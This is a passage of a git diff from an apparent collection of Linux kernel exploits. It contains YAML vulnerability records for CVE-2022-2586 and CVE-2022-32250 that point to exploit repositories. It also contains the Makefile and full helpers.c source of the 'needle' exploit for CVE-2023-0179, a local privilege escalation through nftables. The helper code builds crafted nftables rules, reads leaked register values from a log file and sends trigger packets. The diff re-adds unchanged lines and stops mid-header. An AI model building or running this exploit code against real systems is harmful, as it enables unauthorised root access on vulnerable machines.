- - https://ubuntu.com/security/notices/USN-5560-1
- - https://ubuntu.com/security/notices/USN-5560-2
- - https://ubuntu.com/security/notices/USN-5562-1
- - https://ubuntu.com/security/notices/USN-5564-1
- - https://ubuntu.com/security/notices/USN-5565-1
- - https://ubuntu.com/security/notices/USN-5566-1
- - https://ubuntu.com/security/notices/USN-5567-1
- - https://ubuntu.com/security/notices/USN-5582-1
- classification:
- cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 6.7
- cve-id: CVE-2022-2586
- cnvd-id: NONE
+id: CVE-2022-2586
+source: https://github.com/aels/CVE-2022-2586-LPE
+info:
+ name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+ severity: medium
+ description: |
+ Linux nf_tables cross-table存在安全漏洞,该漏洞源于释放后重用,允许本地特权攻击者在删除表时导致释放后重用,可能导致本地特权升级。
+ scope-of-influence:
+ Red Hat Enterprise Linux 9
+ reference:
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2586
+ - https://www.openwall.com/lists/oss-security/2022/08/09/5
+ - https://lore.kernel.org/netfilter-devel/20220809170148.164591-1-cascardo@canonical.com/T/#t
+ - https://www.zerodayinitiative.com/advisories/ZDI-22-1118/
+ - https://ubuntu.com/security/notices/USN-5557-1
+ - https://ubuntu.com/security/notices/USN-5560-1
+ - https://ubuntu.com/security/notices/USN-5560-2
+ - https://ubuntu.com/security/notices/USN-5562-1
+ - https://ubuntu.com/security/notices/USN-5564-1
+ - https://ubuntu.com/security/notices/USN-5565-1
+ - https://ubuntu.com/security/notices/USN-5566-1
+ - https://ubuntu.com/security/notices/USN-5567-1
+ - https://ubuntu.com/security/notices/USN-5582-1
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 6.7
+ cve-id: CVE-2022-2586
+ cnvd-id: NONE
 tags: netfilter, cve2022
\ No newline at end of file
diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml
index 611fb2f1..62fd85c0 100644
--- a/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml
+++ b/cve/linux-kernel/2022/yaml/CVE-2022-32250.yaml
@@ -1,18 +1,18 @@
-id: CVE-2022-32250
-source: https://github.com/theori-io/CVE-2022-32250-exploit
-info:
- name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
- severity: high
- description: |
- Linux内核5.18.1中的net/netfilter/nf_tables_api.c允许本地用户(能够创建用户/net命名空间)将权限升级到root,因为错误的NFT_STATEFUL_EXPR检查会导致释放后使用。
- scope-of-influence:
- Linux kernel 5.15.0-27
- reference:
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32250
- - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-32250
- classification:
- cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 7.8
- cve-id: CVE-2022-32250
- cnvd-id: CNNVD-202206-407
- tags: CVSS严重性评级,修复信息,易受攻击的软件版本,SCAP映射,CPE信息,cve2022
+id: CVE-2022-32250
+source: https://github.com/theori-io/CVE-2022-32250-exploit
+info:
+ name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+ severity: high
+ description: |
+ Linux内核5.18.1中的net/netfilter/nf_tables_api.c允许本地用户(能够创建用户/net命名空间)将权限升级到root,因为错误的NFT_STATEFUL_EXPR检查会导致释放后使用。
+ scope-of-influence:
+ Linux kernel 5.15.0-27
+ reference:
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32250
+ - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-32250
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
+ cve-id: CVE-2022-32250
+ cnvd-id: CNNVD-202206-407
+ tags: CVSS严重性评级,修复信息,易受攻击的软件版本,SCAP映射,CPE信息,cve2022
diff --git a/cve/linux-kernel/2023/CVE-2023-0179/Makefile b/cve/linux-kernel/2023/CVE-2023-0179/Makefile
index 2a0391f0..9431825d 100644
--- a/cve/linux-kernel/2023/CVE-2023-0179/Makefile
+++ b/cve/linux-kernel/2023/CVE-2023-0179/Makefile
@@ -1,12 +1,12 @@
-objects= ./helpers.o ./exploit.o ./needle.o
-
-.PHONY: clean needle
-
-needle: $(objects)
- $(CC) $(objects) -lmnl -lnftnl -o needle
-
-./%.o: %.c
- $(CC) -c $(CFLAGS) -o "$@" "$<"
-
-clean:
- rm -rf ./helpers.o ./needle.o ./needle ./exploit.o
+objects= ./helpers.o ./exploit.o ./needle.o
+
+.PHONY: clean needle
+
+needle: $(objects)
+ $(CC) $(objects) -lmnl -lnftnl -o needle
+
+./%.o: %.c
+ $(CC) -c $(CFLAGS) -o "$@" "$<"
+
+clean:
+ rm -rf ./helpers.o ./needle.o ./needle ./exploit.o
diff --git a/cve/linux-kernel/2023/CVE-2023-0179/helpers.c b/cve/linux-kernel/2023/CVE-2023-0179/helpers.c
index ca5ebf22..706ac927 100644
--- a/cve/linux-kernel/2023/CVE-2023-0179/helpers.c
+++ b/cve/linux-kernel/2023/CVE-2023-0179/helpers.c
@@ -1,395 +1,395 @@ -/* - * ---------------------------------------------------------------------------- - * "THE BEER-WARE LICENSE" (Revision 42): - * David Bouman (pql) wrote this file. As long as you retain this notice you - * can do whatever you want with this stuff. If we meet some day, and you think - * this stuff is worth it, you can buy me a beer in return. Signed, David. - * ---------------------------------------------------------------------------- - */ - -#define _GNU_SOURCE -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#include "helpers.h" - -unsigned long read_from_file(int line) { - int fd; - char buf[20]; - unsigned long result; - char *endptr; - - fd = open("reg.log", O_RDONLY); - if (fd == -1) { - perror("open"); - exit(1); - } - - if (read(fd, buf, sizeof(buf)) == -1) { - perror("read"); - close(fd); - exit(1); - } - - if (line == 1 && read(fd, buf, sizeof(buf)) == -1) { - perror("read"); - close(fd); - exit(1); - } - - result = strtoul(buf, &endptr, 16); - if (result == ULONG_MAX && endptr == buf) { - fprintf(stderr, "strtoul: invalid argument\n"); - close(fd); - exit(1); - } - close(fd); - return result; -} - -static uint64_t default_batch_req_handler(struct mnl_socket* nl, int portid, int table_seq) -{ - char buf[MNL_SOCKET_BUFFER_SIZE]; - - int ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); - - while (ret > 0) { - ret = mnl_cb_run(buf, ret, table_seq, portid, NULL, NULL); - if (ret <= 0) break; - ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); - } - return ret; -} - -int64_t send_batch_request(struct mnl_socket* nl, uint16_t msg, uint16_t msg_flags, uint16_t family, void** object, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)) -{ - char buf[MNL_SOCKET_BUFFER_SIZE]; - struct mnl_nlmsg_batch* batch = mnl_nlmsg_batch_start(buf, sizeof buf); - uint8_t msg_type = msg & 0xff; - uint8_t 
nft_type = (msg >> 8) & 0xff; - nftnl_batch_begin(mnl_nlmsg_batch_current(batch), (*seq)++); - mnl_nlmsg_batch_next(batch); - int table_seq = *seq; - struct nlmsghdr* nlh; - - if (result_handler == NULL) { - result_handler = default_batch_req_handler; - } - - if (msg == NFT_MSG_NEWSET) { - nlh = nftnl_set_nlmsg_build_hdr( - mnl_nlmsg_batch_current(batch), - NFT_MSG_NEWSET, family, - msg_flags | NLM_F_ACK, (*seq)++); - } else { - nlh = nftnl_nlmsg_build_hdr( - mnl_nlmsg_batch_current(batch), - msg_type, family, - msg_flags | NLM_F_ACK, (*seq)++ - ); - } - if (msg == NFT_MSG_NEWSET) { - nftnl_set_nlmsg_build_payload(nlh, *object); - nftnl_set_free(*object); - } else { - switch(nft_type) { - case NFT_TYPE_TABLE: - nftnl_table_nlmsg_build_payload(nlh, *object); - nftnl_table_free(*object); - break; - case NFT_TYPE_CHAIN: - nftnl_chain_nlmsg_build_payload(nlh, *object); - nftnl_chain_free(*object); - break; - case NFT_TYPE_RULE: - nftnl_rule_nlmsg_build_payload(nlh, *object); - // offload mnl_attr_put_u32(nlh, NFTA_CHAIN_FLAGS, htonl(2)); - nftnl_rule_free(*object); - break; - default: - return -1; - } - } - - *object = NULL; - - mnl_nlmsg_batch_next(batch); - nftnl_batch_end(mnl_nlmsg_batch_current(batch), (*seq)++); - mnl_nlmsg_batch_next(batch); - - int ret = mnl_socket_sendto( - nl, - mnl_nlmsg_batch_head(batch), - mnl_nlmsg_batch_size(batch) - ); - - if (ret < 0) { - perror("mnl_socket_send"); - return -1; - } - - int portid = mnl_socket_get_portid(nl); - - mnl_nlmsg_batch_stop(batch); - - result_handler(nl, portid, table_seq); -} - -struct nftnl_table* build_table(char* name, uint16_t family) -{ - struct nftnl_table* t = nftnl_table_alloc(); - - nftnl_table_set_u32(t, NFTNL_TABLE_FAMILY, family); - nftnl_table_set_str(t, NFTNL_TABLE_NAME, name); - - return t; -} - -struct nftnl_chain* build_chain(char* table_name, char* chain_name, char *dev_name, struct unft_base_chain_param* base_param) -{ - struct nftnl_chain* c; - - c = nftnl_chain_alloc(); - - 
nftnl_chain_set_str(c, NFTNL_CHAIN_NAME, chain_name); - nftnl_chain_set_str(c, NFTNL_CHAIN_TABLE, table_name); - if (dev_name) - nftnl_chain_set_str(c, NFTNL_CHAIN_DEV, dev_name); - - if (base_param) { - nftnl_chain_set_u32(c, NFTNL_CHAIN_HOOKNUM, base_param->hook_num); - nftnl_chain_set_u32(c, NFTNL_CHAIN_PRIO, base_param->prio); - } - - return c; -} - -struct nftnl_rule* build_rule(char* table_name, char* chain_name, uint16_t family, uint64_t* handle) -{ - struct nftnl_rule* r = NULL; - uint8_t proto; - - r = nftnl_rule_alloc(); - - nftnl_rule_set_str(r, NFTNL_RULE_TABLE, table_name); - nftnl_rule_set_str(r, NFTNL_RULE_CHAIN, chain_name); - nftnl_rule_set_u32(r, NFTNL_RULE_FAMILY, family); - - if (handle) { - nftnl_rule_set_u64(r, NFTNL_RULE_POSITION, *handle); - } - - return r; -} - -struct nftnl_set* build_set(char *table_name, char *set_name, uint16_t family) -{ - // Create a new set object - struct nftnl_set *set = nftnl_set_alloc(); - - nftnl_set_set_str(set, NFTNL_SET_TABLE, table_name); - nftnl_set_set_str(set, NFTNL_SET_NAME, set_name); - nftnl_set_set_u32(set, NFTNL_SET_FLAGS, NFT_SET_MAP); - nftnl_set_set_u32(set, NFTNL_SET_DATA_TYPE, NFT_DATA_VALUE); - nftnl_set_set_u32(set, NFTNL_SET_KEY_LEN, 4); - nftnl_set_set_u32(set, NFTNL_SET_DATA_LEN, 4); - nftnl_set_set_u32(set, NFTNL_SET_FAMILY, family); - nftnl_set_set_u32(set, NFTNL_SET_ID, 1); - - //nftnl_set_add_expr(set, expr); - return set; -} - -#define NFTA_BITWISE_OP NFTA_BITWISE_XOR + 1 -#define NFTA_BITWISE_DATA NFTA_BITWISE_OP + 1 - -void rule_add_bit_shift( - struct nftnl_rule* r, uint32_t shift_type, uint32_t bitwise_len, - uint32_t bitwise_sreg, uint32_t bitwise_dreg, void* data, uint32_t data_len) -{ - - if(bitwise_len > 0xff) { - puts("bitwise_len > 0xff"); - exit(EXIT_FAILURE); - } - - struct nftnl_expr* e; - e = nftnl_expr_alloc("bitwise"); - - nftnl_expr_set_u32(e, NFTA_BITWISE_SREG, bitwise_sreg); - nftnl_expr_set_u32(e, NFTA_BITWISE_DREG, bitwise_dreg); - nftnl_expr_set_u32(e, 
NFTA_BITWISE_OP, shift_type); - nftnl_expr_set_u32(e, NFTA_BITWISE_LEN, bitwise_len); - nftnl_expr_set_data(e, NFTA_BITWISE_DATA, data, data_len); - - nftnl_rule_add_expr(r, e); -} - -void rule_add_memcpy(struct nftnl_rule* r, uint32_t len, uint32_t sreg, uint32_t dreg) -{ - uint32_t data = 0; - rule_add_bit_shift(r, NFT_BITWISE_LSHIFT, len, sreg, dreg, &data, sizeof(data)); -} - -void rule_add_dynset(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data) -{ - struct nftnl_expr *expr = nftnl_expr_alloc("dynset"); - nftnl_expr_set_str(expr, NFTNL_EXPR_DYNSET_SET_NAME, set_name); - nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_OP, NFT_DYNSET_OP_UPDATE); - nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SET_ID, 1); - nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SREG_KEY, reg_key); - nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SREG_DATA, reg_data); - nftnl_rule_add_expr(r, expr); -} - -void rule_add_lookup(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data) -{ - struct nftnl_expr *expr = nftnl_expr_alloc("lookup"); - nftnl_expr_set_str(expr, NFTNL_EXPR_LOOKUP_SET, set_name); - nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_SET_ID, 1); - nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_SREG, reg_key); - nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_DREG, reg_data); - nftnl_rule_add_expr(r, expr); -} - -void rule_add_payload(struct nftnl_rule* r, uint32_t base, uint32_t offset, uint32_t len, uint32_t dreg) -{ - struct nftnl_expr* e; - e = nftnl_expr_alloc("payload"); - - nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_BASE, base); - nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_OFFSET, offset); - nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_LEN, len); - nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_DREG, dreg); - - nftnl_rule_add_expr(r, e); -} - -void rule_add_cmp(struct nftnl_rule* r, uint32_t op, uint32_t sreg, void* data, size_t data_len) -{ - struct nftnl_expr* e; - e = nftnl_expr_alloc("cmp"); - - nftnl_expr_set_u32(e, NFTA_CMP_OP, op); - nftnl_expr_set_u32(e, 
NFTA_CMP_SREG, sreg); - nftnl_expr_set_data(e, NFTA_CMP_DATA, data, data_len); - - nftnl_rule_add_expr(r, e); -} - -void rule_add_immediate_data(struct nftnl_rule* r, uint32_t dreg, void* data, size_t data_len) -{ - struct nftnl_expr* e; - - e = nftnl_expr_alloc("immediate"); - - nftnl_expr_set_u32(e, NFTA_IMMEDIATE_DREG, dreg); - nftnl_expr_set_data(e, NFTA_IMMEDIATE_DATA, data, data_len); - - nftnl_rule_add_expr(r, e); -} - -void rule_add_immediate_verdict(struct nftnl_rule* r, uint32_t verdict, char* chain_name) -{ - struct nftnl_expr* e; - e = nftnl_expr_alloc("immediate"); - - // dreg = 0 -> verdict - nftnl_expr_set_u32(e, NFTA_IMMEDIATE_DREG, NFT_REG_VERDICT); - nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_VERDICT, verdict); - if (verdict == NFT_GOTO || verdict == NFT_JUMP) { - nftnl_expr_set_str(e, NFTNL_EXPR_IMM_CHAIN, chain_name); - } - - nftnl_rule_add_expr(r, e); -} - -int create_table(struct mnl_socket* nl, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)) -{ - struct nftnl_table* t = build_table(name, family); - - return send_batch_request( - nl, - NFT_MSG_NEWTABLE | (NFT_TYPE_TABLE << 8), - NLM_F_CREATE, family, (void**)&t, seq, - result_handler - ); -} - -int create_set(struct mnl_socket* nl, char *table_name, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)) -{ - struct nftnl_set* s = build_set(table_name, name, family); - - return send_batch_request( - nl, - NFT_MSG_NEWSET, - NLM_F_CREATE, family, (void**)&s, seq, - result_handler - ); -} - -int create_chain(struct mnl_socket* nl, char* chain_name, char* table_name, char* dev_name, uint16_t family, struct unft_base_chain_param* base_param, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)) -{ - struct nftnl_chain* c = build_chain(chain_name, table_name, dev_name, base_param); - - return send_batch_request( - nl, - NFT_MSG_NEWCHAIN | (NFT_TYPE_CHAIN << 8), - NLM_F_CREATE, family, (void**)&c, seq, - 
result_handler - ); -} - -int send_packet() -{ - int sockfd; - struct sockaddr_in addr; - char buffer[] = "This is a test message"; - char *interface_name = "vlan.10"; // double-tagged packet - int interface_index; - struct ifreq ifr; - memset(&ifr, 0, sizeof(ifr)); - memcpy(ifr.ifr_name, interface_name, MIN(strlen(interface_name) + 1, sizeof(ifr.ifr_name))); - - sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); - if (sockfd < 0) { - perror("[-] Error creating socket"); - return 1; - } - - // Set the SO_BINDTODEVICE socket option - if (setsockopt(sockfd, SOL_SOCKET, SO_BINDTODEVICE, (void *)&ifr, sizeof(ifr)) < 0) { - perror("[-] Error setting SO_BINDTODEVICE socket option"); - return 1; - } - - memset(&addr, 0, sizeof(addr)); - addr.sin_family = AF_INET; - addr.sin_addr.s_addr = inet_addr("192.168.123.123"); // random destination - addr.sin_port = htons(1337); - - // Send the UDP packet - if (sendto(sockfd, buffer, sizeof(buffer), 0, (struct sockaddr*)&addr, sizeof(addr)) < 0) { - perror("[-] Error sending UDP packet"); - return 1; - } - - close(sockfd); - return 0; +/* + * ---------------------------------------------------------------------------- + * "THE BEER-WARE LICENSE" (Revision 42): + * David Bouman (pql) wrote this file. As long as you retain this notice you + * can do whatever you want with this stuff. If we meet some day, and you think + * this stuff is worth it, you can buy me a beer in return. Signed, David. 
+ * ---------------------------------------------------------------------------- + */ + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "helpers.h" + +unsigned long read_from_file(int line) { + int fd; + char buf[20]; + unsigned long result; + char *endptr; + + fd = open("reg.log", O_RDONLY); + if (fd == -1) { + perror("open"); + exit(1); + } + + if (read(fd, buf, sizeof(buf)) == -1) { + perror("read"); + close(fd); + exit(1); + } + + if (line == 1 && read(fd, buf, sizeof(buf)) == -1) { + perror("read"); + close(fd); + exit(1); + } + + result = strtoul(buf, &endptr, 16); + if (result == ULONG_MAX && endptr == buf) { + fprintf(stderr, "strtoul: invalid argument\n"); + close(fd); + exit(1); + } + close(fd); + return result; +} + +static uint64_t default_batch_req_handler(struct mnl_socket* nl, int portid, int table_seq) +{ + char buf[MNL_SOCKET_BUFFER_SIZE]; + + int ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); + + while (ret > 0) { + ret = mnl_cb_run(buf, ret, table_seq, portid, NULL, NULL); + if (ret <= 0) break; + ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); + } + return ret; +} + +int64_t send_batch_request(struct mnl_socket* nl, uint16_t msg, uint16_t msg_flags, uint16_t family, void** object, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)) +{ + char buf[MNL_SOCKET_BUFFER_SIZE]; + struct mnl_nlmsg_batch* batch = mnl_nlmsg_batch_start(buf, sizeof buf); + uint8_t msg_type = msg & 0xff; + uint8_t nft_type = (msg >> 8) & 0xff; + nftnl_batch_begin(mnl_nlmsg_batch_current(batch), (*seq)++); + mnl_nlmsg_batch_next(batch); + int table_seq = *seq; + struct nlmsghdr* nlh; + + if (result_handler == NULL) { + result_handler = default_batch_req_handler; + } + + if (msg == NFT_MSG_NEWSET) { + nlh = nftnl_set_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + NFT_MSG_NEWSET, family, + 
msg_flags | NLM_F_ACK, (*seq)++); + } else { + nlh = nftnl_nlmsg_build_hdr( + mnl_nlmsg_batch_current(batch), + msg_type, family, + msg_flags | NLM_F_ACK, (*seq)++ + ); + } + if (msg == NFT_MSG_NEWSET) { + nftnl_set_nlmsg_build_payload(nlh, *object); + nftnl_set_free(*object); + } else { + switch(nft_type) { + case NFT_TYPE_TABLE: + nftnl_table_nlmsg_build_payload(nlh, *object); + nftnl_table_free(*object); + break; + case NFT_TYPE_CHAIN: + nftnl_chain_nlmsg_build_payload(nlh, *object); + nftnl_chain_free(*object); + break; + case NFT_TYPE_RULE: + nftnl_rule_nlmsg_build_payload(nlh, *object); + // offload mnl_attr_put_u32(nlh, NFTA_CHAIN_FLAGS, htonl(2)); + nftnl_rule_free(*object); + break; + default: + return -1; + } + } + + *object = NULL; + + mnl_nlmsg_batch_next(batch); + nftnl_batch_end(mnl_nlmsg_batch_current(batch), (*seq)++); + mnl_nlmsg_batch_next(batch); + + int ret = mnl_socket_sendto( + nl, + mnl_nlmsg_batch_head(batch), + mnl_nlmsg_batch_size(batch) + ); + + if (ret < 0) { + perror("mnl_socket_send"); + return -1; + } + + int portid = mnl_socket_get_portid(nl); + + mnl_nlmsg_batch_stop(batch); + + result_handler(nl, portid, table_seq); +} + +struct nftnl_table* build_table(char* name, uint16_t family) +{ + struct nftnl_table* t = nftnl_table_alloc(); + + nftnl_table_set_u32(t, NFTNL_TABLE_FAMILY, family); + nftnl_table_set_str(t, NFTNL_TABLE_NAME, name); + + return t; +} + +struct nftnl_chain* build_chain(char* table_name, char* chain_name, char *dev_name, struct unft_base_chain_param* base_param) +{ + struct nftnl_chain* c; + + c = nftnl_chain_alloc(); + + nftnl_chain_set_str(c, NFTNL_CHAIN_NAME, chain_name); + nftnl_chain_set_str(c, NFTNL_CHAIN_TABLE, table_name); + if (dev_name) + nftnl_chain_set_str(c, NFTNL_CHAIN_DEV, dev_name); + + if (base_param) { + nftnl_chain_set_u32(c, NFTNL_CHAIN_HOOKNUM, base_param->hook_num); + nftnl_chain_set_u32(c, NFTNL_CHAIN_PRIO, base_param->prio); + } + + return c; +} + +struct nftnl_rule* build_rule(char* 
table_name, char* chain_name, uint16_t family, uint64_t* handle) +{ + struct nftnl_rule* r = NULL; + uint8_t proto; + + r = nftnl_rule_alloc(); + + nftnl_rule_set_str(r, NFTNL_RULE_TABLE, table_name); + nftnl_rule_set_str(r, NFTNL_RULE_CHAIN, chain_name); + nftnl_rule_set_u32(r, NFTNL_RULE_FAMILY, family); + + if (handle) { + nftnl_rule_set_u64(r, NFTNL_RULE_POSITION, *handle); + } + + return r; +} + +struct nftnl_set* build_set(char *table_name, char *set_name, uint16_t family) +{ + // Create a new set object + struct nftnl_set *set = nftnl_set_alloc(); + + nftnl_set_set_str(set, NFTNL_SET_TABLE, table_name); + nftnl_set_set_str(set, NFTNL_SET_NAME, set_name); + nftnl_set_set_u32(set, NFTNL_SET_FLAGS, NFT_SET_MAP); + nftnl_set_set_u32(set, NFTNL_SET_DATA_TYPE, NFT_DATA_VALUE); + nftnl_set_set_u32(set, NFTNL_SET_KEY_LEN, 4); + nftnl_set_set_u32(set, NFTNL_SET_DATA_LEN, 4); + nftnl_set_set_u32(set, NFTNL_SET_FAMILY, family); + nftnl_set_set_u32(set, NFTNL_SET_ID, 1); + + //nftnl_set_add_expr(set, expr); + return set; +} + +#define NFTA_BITWISE_OP NFTA_BITWISE_XOR + 1 +#define NFTA_BITWISE_DATA NFTA_BITWISE_OP + 1 + +void rule_add_bit_shift( + struct nftnl_rule* r, uint32_t shift_type, uint32_t bitwise_len, + uint32_t bitwise_sreg, uint32_t bitwise_dreg, void* data, uint32_t data_len) +{ + + if(bitwise_len > 0xff) { + puts("bitwise_len > 0xff"); + exit(EXIT_FAILURE); + } + + struct nftnl_expr* e; + e = nftnl_expr_alloc("bitwise"); + + nftnl_expr_set_u32(e, NFTA_BITWISE_SREG, bitwise_sreg); + nftnl_expr_set_u32(e, NFTA_BITWISE_DREG, bitwise_dreg); + nftnl_expr_set_u32(e, NFTA_BITWISE_OP, shift_type); + nftnl_expr_set_u32(e, NFTA_BITWISE_LEN, bitwise_len); + nftnl_expr_set_data(e, NFTA_BITWISE_DATA, data, data_len); + + nftnl_rule_add_expr(r, e); +} + +void rule_add_memcpy(struct nftnl_rule* r, uint32_t len, uint32_t sreg, uint32_t dreg) +{ + uint32_t data = 0; + rule_add_bit_shift(r, NFT_BITWISE_LSHIFT, len, sreg, dreg, &data, sizeof(data)); +} + +void 
rule_add_dynset(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data) +{ + struct nftnl_expr *expr = nftnl_expr_alloc("dynset"); + nftnl_expr_set_str(expr, NFTNL_EXPR_DYNSET_SET_NAME, set_name); + nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_OP, NFT_DYNSET_OP_UPDATE); + nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SET_ID, 1); + nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SREG_KEY, reg_key); + nftnl_expr_set_u32(expr, NFTNL_EXPR_DYNSET_SREG_DATA, reg_data); + nftnl_rule_add_expr(r, expr); +} + +void rule_add_lookup(struct nftnl_rule* r, char *set_name, uint32_t reg_key, uint32_t reg_data) +{ + struct nftnl_expr *expr = nftnl_expr_alloc("lookup"); + nftnl_expr_set_str(expr, NFTNL_EXPR_LOOKUP_SET, set_name); + nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_SET_ID, 1); + nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_SREG, reg_key); + nftnl_expr_set_u32(expr, NFTNL_EXPR_LOOKUP_DREG, reg_data); + nftnl_rule_add_expr(r, expr); +} + +void rule_add_payload(struct nftnl_rule* r, uint32_t base, uint32_t offset, uint32_t len, uint32_t dreg) +{ + struct nftnl_expr* e; + e = nftnl_expr_alloc("payload"); + + nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_BASE, base); + nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_OFFSET, offset); + nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_LEN, len); + nftnl_expr_set_u32(e, NFTNL_EXPR_PAYLOAD_DREG, dreg); + + nftnl_rule_add_expr(r, e); +} + +void rule_add_cmp(struct nftnl_rule* r, uint32_t op, uint32_t sreg, void* data, size_t data_len) +{ + struct nftnl_expr* e; + e = nftnl_expr_alloc("cmp"); + + nftnl_expr_set_u32(e, NFTA_CMP_OP, op); + nftnl_expr_set_u32(e, NFTA_CMP_SREG, sreg); + nftnl_expr_set_data(e, NFTA_CMP_DATA, data, data_len); + + nftnl_rule_add_expr(r, e); +} + +void rule_add_immediate_data(struct nftnl_rule* r, uint32_t dreg, void* data, size_t data_len) +{ + struct nftnl_expr* e; + + e = nftnl_expr_alloc("immediate"); + + nftnl_expr_set_u32(e, NFTA_IMMEDIATE_DREG, dreg); + nftnl_expr_set_data(e, NFTA_IMMEDIATE_DATA, data, data_len); + 
+ nftnl_rule_add_expr(r, e); +} + +void rule_add_immediate_verdict(struct nftnl_rule* r, uint32_t verdict, char* chain_name) +{ + struct nftnl_expr* e; + e = nftnl_expr_alloc("immediate"); + + // dreg = 0 -> verdict + nftnl_expr_set_u32(e, NFTA_IMMEDIATE_DREG, NFT_REG_VERDICT); + nftnl_expr_set_u32(e, NFTNL_EXPR_IMM_VERDICT, verdict); + if (verdict == NFT_GOTO || verdict == NFT_JUMP) { + nftnl_expr_set_str(e, NFTNL_EXPR_IMM_CHAIN, chain_name); + } + + nftnl_rule_add_expr(r, e); +} + +int create_table(struct mnl_socket* nl, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)) +{ + struct nftnl_table* t = build_table(name, family); + + return send_batch_request( + nl, + NFT_MSG_NEWTABLE | (NFT_TYPE_TABLE << 8), + NLM_F_CREATE, family, (void**)&t, seq, + result_handler + ); +} + +int create_set(struct mnl_socket* nl, char *table_name, char* name, uint16_t family, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)) +{ + struct nftnl_set* s = build_set(table_name, name, family); + + return send_batch_request( + nl, + NFT_MSG_NEWSET, + NLM_F_CREATE, family, (void**)&s, seq, + result_handler + ); +} + +int create_chain(struct mnl_socket* nl, char* chain_name, char* table_name, char* dev_name, uint16_t family, struct unft_base_chain_param* base_param, int* seq, uint64_t (*result_handler)(struct mnl_socket*, int, int)) +{ + struct nftnl_chain* c = build_chain(chain_name, table_name, dev_name, base_param); + + return send_batch_request( + nl, + NFT_MSG_NEWCHAIN | (NFT_TYPE_CHAIN << 8), + NLM_F_CREATE, family, (void**)&c, seq, + result_handler + ); +} + +int send_packet() +{ + int sockfd; + struct sockaddr_in addr; + char buffer[] = "This is a test message"; + char *interface_name = "vlan.10"; // double-tagged packet + int interface_index; + struct ifreq ifr; + memset(&ifr, 0, sizeof(ifr)); + memcpy(ifr.ifr_name, interface_name, MIN(strlen(interface_name) + 1, sizeof(ifr.ifr_name))); + + sockfd = socket(AF_INET, 
SOCK_DGRAM, IPPROTO_UDP); + if (sockfd < 0) { + perror("[-] Error creating socket"); + return 1; + } + + // Set the SO_BINDTODEVICE socket option + if (setsockopt(sockfd, SOL_SOCKET, SO_BINDTODEVICE, (void *)&ifr, sizeof(ifr)) < 0) { + perror("[-] Error setting SO_BINDTODEVICE socket option"); + return 1; + } + + memset(&addr, 0, sizeof(addr)); + addr.sin_family = AF_INET; + addr.sin_addr.s_addr = inet_addr("192.168.123.123"); // random destination + addr.sin_port = htons(1337); + + // Send the UDP packet + if (sendto(sockfd, buffer, sizeof(buffer), 0, (struct sockaddr*)&addr, sizeof(addr)) < 0) { + perror("[-] Error sending UDP packet"); + return 1; + } + + close(sockfd); + return 0; } \ No newline at end of file diff --git a/cve/linux-kernel/2023/CVE-2023-0179/helpers.h b/cve/linux-kernel/2023/CVE-2023-0179/helpers.h index f62b1c1d..54ad08de 100644 --- 